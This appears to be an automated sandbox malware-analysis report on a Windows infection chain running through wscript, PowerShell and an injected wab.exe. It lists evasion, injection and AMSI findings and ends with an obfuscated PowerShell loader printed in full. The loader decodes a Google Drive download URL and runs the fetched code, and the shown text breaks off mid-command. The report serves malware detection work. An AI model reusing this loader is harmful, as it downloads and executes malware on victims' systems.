Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_07481E10 push cs; iretd 13_2_07481E26
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_07480013 push cs; iretd 13_2_07480026
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_07481013 push cs; iretd 13_2_07481026
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_07481613 push cs; iretd 13_2_07481626
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_07481813 push cs; iretd 13_2_07481826
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_07481C2F pushfd ; iretd 13_2_07481C48
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0748083B pushfd ; ret 13_2_07480848
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0747E8E8 pushfd ; ret 13_2_0747E8E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Program Files (x86)\Windows Mail\wab.exe API/Special instruction interceptor: Address: 766E8DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5453 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4436 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7156 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2592 Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 6904 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2716 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5192 Thread sleep count: 7156 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5112 Thread sleep count: 2592 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5668 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: wscript.exe, 00000000.00000003.2115161308.000001D124CA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115370479.000001D124CA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2113344906.000001D124CA5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115604649.000001D124CA5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000008.00000002.3601488920.00000197DBC3C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: amsi64_4416.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4416, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7148, type: MEMORYSTR
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 40E0000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2E7F8C4 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes labeler Esmeralda Prepious Engleskares Archaiser Dolphinfishes150 Pungi Amar Sjlesorger shopkeeper Nephrostomy Mainframes Raninae Kobberbrylluppet firethorn Smlds outslander Praedikaterne Ublufrdigste Sejlklubbers Amtsskatteinspektoratet Nondecoration235 Topminnow Interveneredes';If (${host}.CurrentCulture) {$Almengjorde++;}Function Sprge($Kalkunernes){$batterdock=$Kalkunernes.Length-$Almengjorde;$Experientialistic='SUBsTRI';$Experientialistic+='ng';For( $Ricabooracker=2;$Ricabooracker -lt $batterdock;$Ricabooracker+=3){$labeler+=$Kalkunernes.$Experientialistic.Invoke( $Ricabooracker, $Almengjorde);}$labeler;}function Dkvingen($Smaaborgerligeres){ & ($Hektoliters) ($Smaaborgerligeres);}$Omsorgsfuldere=Sprge 'B,MSpoInzBaiAmlBal.ua,e/Gu5Mu.He0A .i(,eW ,iBlnIndAroScwP sSk EnN.rTFo 1Di0He.D.0Rn;Sp FiW AiLant 6 r4.e;Bo AdxSu6Gi4Ad;Wi RhrAnvAs:Pl1He2Tr1Mi..r0Su)al GeG LeSkcU.k AoNa/C,2Pe0Fa1Pr0.e0Ot1An0Om1ag InFA,i Fr,ueLafSuoHexb,/Ne1 D2 ,1 U. ,0B, ';$Theorize=Sprge 'BiU,is .eStrAn-L A eg,reSunYat H ';$Archaiser=Sprge 'HahFet.ut Dp ss C: A/Ta/ .dLar RiUdvPoeS,.DegRuoF,o og.ylKae K.Foc Mo,rmSj/ReuPacNe?Ase,oxTep.eo TrShtEr=SedSeoK.wVinShlKyoUlaStd,n& BiPedK.= M1 ,-F.zTy0ral M_F 0E MPrGbuUTrlSoc COCy-Br5 TeKoO NlS Z.kq LtKnS LuLilSa5 Su.rzSng nPT.Xl pSihSi_Li ';$Pediococci150=Sprge 'Br>P. ';$Hektoliters=Sprge 'PriHeeAyxUn ';$Koksede='Amar';$Doktordisputatsen = Sprge ',aeMacRuhHao l ,a%B.a.hpHep .dK a DtM,aRe% a\S.FT.oA.lAekMieHes nlExaSeg ,eCrtD.. .O,up,di,y Co&Fo&Fu M,e cDehT oDo Unts. ';Dkvingen (Sprge 'Ve$ ,gnelRuoFabSraPilCe:BeSett .asptA iC o Sn,lcBaaF.r .eDunl =S,( BchomEfdEm De/ Nc , B$I,DefoKekA.turoRerDidBriKls Ap,auCatp,aGatAfs .e CnLe) Z ');Dkvingen (Sprge ' ,$,egDel.ao ,bIna ,lSa: MES n RgdalP eU s rkK a,ir TeKos,a=Va$JuA .r .cFlh ,aUniSks le nrUd. Ds ,pFaljuiS t .( M$UnP .eAndB,i o BcPyo.tc ScFoi P1Sc5 T0 s)Ek ');Dkvingen (Sprge ' y[ NC e ,tPr. iSCaePar.rv.ii.ec .eIlPkoo oi rnRatClM Ta.pnAcaVigSaeRerCh],e:Ek: ASPaeK.c Mu .r PiEntHjy TPGar AoIntQuoVic,uo Vl =In [ N ee ItPr. .SHoe bcCou trMyi HtOmy.iPUdrSkoP.t oVac 